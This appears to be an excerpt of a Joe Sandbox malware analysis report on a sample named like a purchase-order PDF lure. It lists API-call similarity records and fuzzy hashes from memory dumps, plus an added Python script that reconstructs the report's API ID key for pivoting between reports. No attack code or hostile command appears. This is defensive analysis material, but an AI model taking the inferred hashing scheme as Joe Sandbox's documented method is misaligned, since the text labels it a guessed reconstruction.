                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: IconNotifyShell__memset
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 928536360-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: a8f79553875ba5cd412c6e6f6aef719f94b94a7ff7df26053db2d04cf48d3506
                                                                                                                                                                                                                                                                                                            • Instruction ID: 9c6d99eda8392314e00a4319cd3b9f491a6d528882fc0aac3328a2d60ab56ec1
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a8f79553875ba5cd412c6e6f6aef719f94b94a7ff7df26053db2d04cf48d3506
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FC318170608701DFD320DF25D845B97BBF8BB45304F00486EE99A93380E778A958CF5A
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32 ref: 00472806
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00443EEF: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 00443F11
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00443EEF: GetCurrentThreadId.KERNEL32 ref: 00443F18
                                                                                                                                                                                                                                                                                                              • Part of subcall function 00443EEF: AttachThreadInput.USER32(00000000), ref: 00443F1F
                                                                                                                                                                                                                                                                                                            • GetCaretPos.USER32(?), ref: 0047281A
                                                                                                                                                                                                                                                                                                            • ClientToScreen.USER32(00000000,?), ref: 00472856
                                                                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32 ref: 0047285C
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
• String ID:
• API String ID: 2759813231-0
• Opcode ID: f08c9821fa495b0e17bd1c697e1e5286648ea95901ecf1a9ceb1535147bec3ee
• Instruction ID: 38f02bd9b1f6bed34cfa7ce2d7f69328ba3456287a0ba45db7850a86b8391dd2
• Opcode Fuzzy Hash: f08c9821fa495b0e17bd1c697e1e5286648ea95901ecf1a9ceb1535147bec3ee
• Instruction Fuzzy Hash: FF2195716403056FE310EF65CC42F5BB7E8AF84708F144D2EF544AB282D6FAB9858795
APIs
  • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
• GetWindowLongW.USER32(?,000000EC), ref: 0047728E
• SetWindowLongW.USER32(?,000000EC,00000000), ref: 004772A9
• SetWindowLongW.USER32(?,000000EC,00000000), ref: 004772C0
• SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001,?,?), ref: 004772D0
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: Window$Long$AttributesLayered
• String ID:
• API String ID: 2169480361-0
• Opcode ID: cf64f2ba38e7b8586118add57273b6dbf74680437e58013ae8f64db123384f26
• Instruction ID: faea1ea985e506ac999786301d765d91882fdca708237d94abe4bce3661c65f1
• Opcode Fuzzy Hash: cf64f2ba38e7b8586118add57273b6dbf74680437e58013ae8f64db123384f26
• Instruction Fuzzy Hash: 5F11B431205510ABD310FB29DD45F9BB798FF91720F10862EF455E72E2C7A8AC45C7A8
APIs
• SendMessageW.USER32 ref: 00448CB8
• GetWindowLongW.USER32(?,000000EC), ref: 00448CE0
• SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448D19
• SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D62
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: MessageSend$LongWindow
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 312131281-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 75ae646de43e531ea10203f5aba75cb55710deee3f48b72b110124c921b55059
                                                                                                                                                                                                                                                                                                            • Instruction ID: 9d6bf2a2f0cb0d5184a29e15ea511504db1ac53b4253ca88fa0f688086887250
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 75ae646de43e531ea10203f5aba75cb55710deee3f48b72b110124c921b55059
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B12174715053019BF3208F18D98879FB7E4FBD5325F140B2EF594962D0DBB58449C796
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • select.WSOCK32 ref: 0045890A
                                                                                                                                                                                                                                                                                                            • __WSAFDIsSet.WSOCK32(00000000,00000000), ref: 00458919
                                                                                                                                                                                                                                                                                                            • accept.WSOCK32(00000000,00000000,00000000), ref: 00458927
                                                                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00458952
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: ErrorLastacceptselect
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 385091864-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: abc1db9f2e63247cad6e2e0496bedee0f0acb9a353b4738024f17ecaf3b799d2
                                                                                                                                                                                                                                                                                                            • Instruction ID: 93f38c3b8a65fd8a68e5265ae944391143789c71a4918893f245a539b4228a7d
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: abc1db9f2e63247cad6e2e0496bedee0f0acb9a353b4738024f17ecaf3b799d2
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1F2166712043019BD314EF29C842BABB7E5AFC4714F144A2EF994DB2C1DBB4A985CB99
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00438D6F
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438D82
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438D9A
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00438DB4
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 265964968b448329a9940c71d90cafee1d95b27ec759889be900fe0a368f8aeb
                                                                                                                                                                                                                                                                                                            • Instruction ID: 707762f1bc06eebb59e9357f9c77b20c0e090dcf7cedc03b298b4f863176c0ea
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 265964968b448329a9940c71d90cafee1d95b27ec759889be900fe0a368f8aeb
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 77113AB6204305AFD210EF58DC84F6BF7E8EBE8750F20491EF580D7290D6B1A8468BA1
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(?,?,?,FFFFFFFF,?,?,?,?,?,?,00400000,00000000), ref: 0043367E
                                                                                                                                                                                                                                                                                                            • GetStockObject.GDI32(00000011), ref: 00433695
                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 0043369F
                                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,00000000), ref: 004336BA
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: Window$CreateMessageObjectSendShowStock
• String ID:
• API String ID: 1358664141-0
• Opcode ID: a78582cd8c915fd270119012ff4eddf0033f410814d91724adacf9cac7d73a6b
• Instruction ID: 5bb77caae3378c1c36de35f78993aeb7f53e4fc0e9047450929301c31466c70f
• Opcode Fuzzy Hash: a78582cd8c915fd270119012ff4eddf0033f410814d91724adacf9cac7d73a6b
• Instruction Fuzzy Hash: 60114F72204A00BFD254DF55CC49F5BB3F9AFCCB01F20950DB254922A0D7B4E9418BA9
APIs
• GetCurrentThreadId.KERNEL32 ref: 004441B8
• MessageBoxW.USER32(?,?,?,?), ref: 004441F6
• WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0044420C
• CloseHandle.KERNEL32(00000000), ref: 00444213
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: CloseCurrentHandleMessageObjectSingleThreadWait
• String ID:
• API String ID: 2880819207-0
• Opcode ID: 146d2f4ba151d14deb3aa3acfdd6de045567f86e28c98b22242e1e1489ea4094
• Instruction ID: a177bb78e812b0c83f085b16f259857c8a511f23e32e5024349264f8b0df3d09
• Opcode Fuzzy Hash: 146d2f4ba151d14deb3aa3acfdd6de045567f86e28c98b22242e1e1489ea4094
• Instruction Fuzzy Hash: C401E5364183105BD300DB28ED08A9BBBD8BFD9721F18067EF89893351E6B48948C7B6
APIs
• GetWindowRect.USER32(?,?), ref: 00434037
• ScreenToClient.USER32(?,?), ref: 0043405B
• ScreenToClient.USER32(?,?), ref: 00434085
• InvalidateRect.USER32(?,?,?), ref: 004340A4
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: ClientRectScreen$InvalidateWindow
• String ID:
• API String ID: 357397906-0
• Opcode ID: 751e48bbdad3fa965b56aea51b9fa4e55de6b4169d4940aca7a3583b508516de
• Instruction ID: 02545dd0d615a745195cb6f618e51c1f9c2552a202a2369b8695847d2ce6fb2f
• Opcode Fuzzy Hash: 751e48bbdad3fa965b56aea51b9fa4e55de6b4169d4940aca7a3583b508516de
• Instruction Fuzzy Hash: 24117EB9608302AFC304DF18D98095BBBE9FFD8650F10891EF88993350D770E9498BA2
APIs
• __wsplitpath.LIBCMT ref: 00436A45
  • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
• __wsplitpath.LIBCMT ref: 00436A6C
• __wcsicoll.LIBCMT ref: 00436A93
• __wcsicoll.LIBCMT ref: 00436AB0
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
• String ID:
• API String ID: 1187119602-0
• Opcode ID: 5b78189461bd351535feab14c2aa3b28919a840a222a6c91b90152b853837e7b
• Instruction ID: cc447ddabc085245cf6c6bda96777749177fc915bba42f20b5b260b799017f3a
• Opcode Fuzzy Hash: 5b78189461bd351535feab14c2aa3b28919a840a222a6c91b90152b853837e7b
• Instruction Fuzzy Hash: 690165B64043416BD724EB50D881EEBB3ED7BD8304F04C91EB5C982041FB38D24C87A6
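The Similarity fields of each record are keyed on its APIs list. For the three records on this page whose APIs are visible, the API ID is consistent with tokenizing each API name, dropping a few filler tokens, counting the tokens across all call sites (a nested "Part of subcall function" call counts too), and then emitting the tokens grouped by count, most frequent group first, alphabetical inside a group, with "$" between groups. The Python below is an added reconstruction for pivoting between reports, not Joe Sandbox's own code: the tokenizer and the stop-word set are inferred from these records only and are assumptions, and the API String ID, Opcode and Instruction hashes are not reproduced because the page does not show how they are computed.

```python
import re
from collections import Counter

# Tokens that the records on this page show being dropped from the API ID.
# Inferred from this report only (assumption); "A" is added by analogy to "W".
STOP_TOKENS = {"Get", "Id", "Box", "W", "A", "For", "To"}

# One bullet of an APIs list as printed in the report, e.g.
#   "• MessageBoxW.USER32(?,?,?,?), ref: 004441F6"
#   "  • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2"
API_LINE = re.compile(
    r"•\s*(?:Part of subcall function [0-9A-F]+:\s*)?([A-Za-z_][A-Za-z0-9_]*)\.([A-Z0-9]+)"
)


def tokenize(api_name: str) -> list[str]:
    """Split a Win32-style CamelCase name into words; keep CRT-style (lowercase/underscore) names whole."""
    if api_name[0].isupper():
        return [t for t in re.findall(r"[A-Z][a-z]*", api_name) if t not in STOP_TOKENS]
    return [api_name]


def api_id(api_calls: list[str]) -> str:
    """Build the API ID: token groups by occurrence count (highest first), alphabetical within a group, '$' between groups."""
    counts = Counter(t for name in api_calls for t in tokenize(name))
    by_count: dict[int, list[str]] = {}
    for tok, n in counts.items():
        by_count.setdefault(n, []).append(tok)
    return "$".join("".join(sorted(by_count[n])) for n in sorted(by_count, reverse=True))


def parse_api_calls(record_text: str) -> list[str]:
    """Extract one API name per call site from a record's APIs list (pass only that list, not the whole record)."""
    return [m.group(1) for m in (API_LINE.search(line) for line in record_text.splitlines()) if m]


def api_id_from_record(record_text: str) -> str:
    return api_id(parse_api_calls(record_text))


# The APIs list of the __wsplitpath record above, copied from this report.
RECORD = """\
APIs
• __wsplitpath.LIBCMT ref: 00436A45
  • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
• __wsplitpath.LIBCMT ref: 00436A6C
• __wcsicoll.LIBCMT ref: 00436A93
• __wcsicoll.LIBCMT ref: 00436AB0
"""

if __name__ == "__main__":
    # Two call sites each for __wsplitpath and __wcsicoll, one for the helper:
    print(api_id_from_record(RECORD))  # __wcsicoll__wsplitpath$__wsplitpath_helper
    # Win32 names from the MessageBoxW record: every token occurs once, so a single group.
    print(api_id(["GetCurrentThreadId", "MessageBoxW", "WaitForSingleObject", "CloseHandle"]))
```

Computing the same key from your own disassembly of a related sample lets you search other reports for functions with the same API profile even when the Opcode and Instruction fuzzy hashes differ; treat a match as a lead, not an identification, since the ID ignores call order, arguments and the stopped tokens.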
APIs
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 1597257046-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 6f5b565237f7f1bf08b1bbdf2bbb2a4a46f338674328461ca353586605d018ca
                                                                                                                                                                                                                                                                                                            • Instruction ID: 9df5ee2dcc5f1a759a9cde70f7b42babd8a8bdcc369222b22224423102f690bd
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6f5b565237f7f1bf08b1bbdf2bbb2a4a46f338674328461ca353586605d018ca
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BFF06D32200200AFC314EB66C885E6BB3EAEBC5324F04852EF556C7791DB39F841C764
APIs
• DeleteObject.GDI32(?), ref: 0045564E
• DeleteObject.GDI32(?), ref: 0045565C
• DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
• DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: DeleteDestroyObject$IconWindow
• String ID:
• API String ID: 3349847261-0
• Opcode ID: 3ca9d014447a04aedc0dfd8276f5a6e9fbff97cfd7386ed498fa31ba53dce0fe
• Instruction ID: 3a9029eb8e47786e7dec82746d504bb216afab776d143f23dce7b1a7602128e4
• Opcode Fuzzy Hash: 3ca9d014447a04aedc0dfd8276f5a6e9fbff97cfd7386ed498fa31ba53dce0fe
• Instruction Fuzzy Hash: 06F03C702006419BDB20AF65DDD8A2B77ACEF45322740456AFD04D7242DB28DC498B7D
APIs
• EnterCriticalSection.KERNEL32(?), ref: 0044B60B
• InterlockedExchange.KERNEL32(?,?), ref: 0044B619
• LeaveCriticalSection.KERNEL32(?), ref: 0044B630
• LeaveCriticalSection.KERNEL32(?), ref: 0044B641
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: CriticalSection$Leave$EnterExchangeInterlocked
• String ID:
• API String ID: 2223660684-0
• Opcode ID: ff66e887f7cbb15f4500d5b6eb7e85b0bae77af45fe5867796c74117f3ed7197
• Instruction ID: 8f2921e390180aa9c6083979f061463a0462abb68b72a76a452ff5fd2bc04521
• Opcode Fuzzy Hash: ff66e887f7cbb15f4500d5b6eb7e85b0bae77af45fe5867796c74117f3ed7197
